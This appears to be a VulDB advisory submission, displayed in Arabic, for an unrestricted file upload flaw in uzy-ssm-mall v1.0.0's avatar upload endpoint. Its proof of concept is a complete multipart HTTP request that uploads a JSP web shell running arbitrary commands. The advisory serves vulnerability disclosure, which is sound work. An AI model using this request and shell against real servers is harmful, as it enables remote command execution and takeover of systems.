إرسال #549259: ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Uploadالمعلومات

عنوانghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload
الوصفVulnerability Description In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges. Vulnerability Location The vulnerability is located at the /mall/user/uploadUserHeadImage interface. Code Audit Process Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file, which provides further convenience for attackers to exploit. Code Analysis: The code calls getUserId in multiple places to obtain the user's userid and uses userid for related CRUD operations. appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability. POC: POST /mall/user/uploadUserHeadImage HTTP/1.1 Host: target-ip Cookie: [users'Cookie] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { out.println(line); } %> ------WebKitFormBoundary7MA4YWxkTrZu0gW--
المصدر⚠️ https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4
المستخدم
 XingYue_Mstir (UID 72225)
ارسال02/04/2025 11:54 AM (1 سنة منذ)
الاعتدال14/04/2025 12:36 AM (12 days later)
الحالةتمت الموافقة
إدخال VulDB304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage ملف تجاوز الصلاحيات]
النقاط20

التالي نظرة عامة السابق

Do you need the next level of professionalism?

Upgrade your account now!